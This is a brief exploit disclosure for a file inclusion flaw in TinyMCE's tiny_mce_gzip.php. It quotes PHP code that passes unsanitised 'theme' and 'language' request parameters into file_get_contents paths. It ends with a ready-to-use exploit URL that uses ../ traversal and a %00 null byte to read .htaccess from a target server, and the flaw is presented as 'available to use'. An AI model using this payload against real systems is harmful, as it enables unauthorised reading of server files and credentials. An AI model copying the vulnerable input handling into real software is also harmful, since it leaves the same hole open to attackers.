if magic_quotes_gpc is Off in php.ini then local file inclusion in /jscripts/tiny_mce/tiny_mce_gzip.php is available to use;)!!
why?
#code(jscripts/tiny_mce/tiny_mce_gzip.php)
...
	$theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";
	$language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";
	$plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";
...
	if ($theme) {
		// Write main script and patch some things
		echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));
		echo 'TinyMCE.prototype.loadScript = function() {};';
		echo "tinyMCE.init(TinyMCECompressed_settings);";

		// Load theme, language pack and theme language packs
		echo file_get_contents(realpath("themes/" . $theme . "/editor_template" . $suffix . ".js"));
		echo file_get_contents(realpath("themes/" . $theme . "/langs/" . $language . ".js"));
		echo file_get_contents(realpath("langs/" . $language . ".js"));

#exploit
for example!:
http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced
...